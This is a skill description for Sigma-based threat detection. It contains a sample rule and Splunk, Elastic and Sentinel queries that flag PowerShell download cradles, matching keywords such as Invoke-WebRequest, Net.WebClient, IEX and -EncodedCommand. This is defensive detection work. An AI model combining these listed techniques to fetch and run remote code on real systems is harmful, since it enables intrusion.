Sigma Threat Detection Skill

Description

This skill enables threat hunting and security event analysis using the Sigma detection rule format. It can convert Sigma rules to platform-specific queries (Splunk SPL, Elastic KQL, Microsoft Sentinel KQL), create custom detection rules for new threats, and analyze log data against known attack patterns. Built for SOC analysts and security engineers.

Instructions

1. Rule Conversion: Convert Sigma YAML rules to target SIEM platform query syntax
2. Rule Creation: Write new Sigma rules based on threat descriptions or IOC patterns
3. Log Analysis: Evaluate log entries against Sigma rules to identify matches
4. Coverage Mapping: Map detection rules to MITRE ATT&CK techniques

Rules

• Always validate Sigma YAML syntax before conversion
• Include the MITRE ATT&CK technique ID in every rule's tags field
• Set appropriate level (informational, low, medium, high, critical) based on true positive likelihood
• Use selection and condition fields properly -- avoid overly broad detection patterns
• Include falsepositives section to help analysts triage alerts
• Test rules against sample log data when provided
• Reference the SigmaHQ rule repository for existing coverage before writing new rules

Sigma Rule Template

Copy
title: Suspicious PowerShell Download Cradle
id: 3b6ab547-0998-4b4e-9f54-c0623e3e6f01
status: stable
description: |
  Detects PowerShell commands commonly used to download and execute
  payloads from remote servers (download cradle patterns).
author: Security Team
date: 2025/03/01
modified: 2025/03/15
references:
  - https://attack.mitre.org/techniques/T1059/001/
tags:
  - attack.execution
  - attack.t1059.001
  - attack.t1105
logsource:
  category: process_creation
  product: windows
detection:
  selection_cmdlet:
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'Invoke-RestMethod'
      - 'wget '
      - 'curl '
      - 'Net.WebClient'
      - 'Start-BitsTransfer'
  selection_execute:
    CommandLine|contains:
      - 'IEX'
      - 'Invoke-Expression'
      - '-enc '
      - '-EncodedCommand'
      - 'FromBase64String'
  condition: selection_cmdlet and selection_execute
falsepositives:
  - Legitimate software installation scripts
  - System administration automation
level: high

SIEM Conversion Examples

Splunk SPL

Copy
index=windows sourcetype=WinEventLog:Security EventCode=4688
| where match(CommandLine, "(?i)(Invoke-WebRequest|Net\.WebClient|wget|curl)")
| where match(CommandLine, "(?i)(IEX|Invoke-Expression|-enc |FromBase64String)")
| table _time, Computer, User, CommandLine, ParentCommandLine

Elastic KQL

Copy
process.command_line: (*Invoke-WebRequest* OR *Net.WebClient* OR *wget* OR *curl*)
AND process.command_line: (*IEX* OR *Invoke-Expression* OR *-enc* OR *FromBase64String*)

Microsoft Sentinel KQL

Copy
SecurityEvent
| where EventID == 4688
| where CommandLine has_any ("Invoke-WebRequest", "Net.WebClient", "wget", "curl")
| where CommandLine has_any ("IEX", "Invoke-Expression", "-enc", "FromBase64String")
| project TimeGenerated, Computer, Account, CommandLine, ParentProcessName

MITRE ATT&CK Coverage Report

Copy
| Technique | ID | Detection Rules | Coverage |
|-----------|----|----------------|----------|
| PowerShell | T1059.001 | 12 | HIGH |
| Scheduled Task | T1053.005 | 8 | MEDIUM |
| Registry Run Keys | T1547.001 | 6 | MEDIUM |
| Pass the Hash | T1550.002 | 3 | LOW |
| DCSync | T1003.006 | 2 | LOW |

Examples

"Convert this Sigma rule to Splunk SPL format"
"Create a detection rule for lateral movement via WMI"
"Map our current Sigma rules to MITRE ATT&CK and show gaps"
"Analyze these Windows event logs for T1059 execution techniques"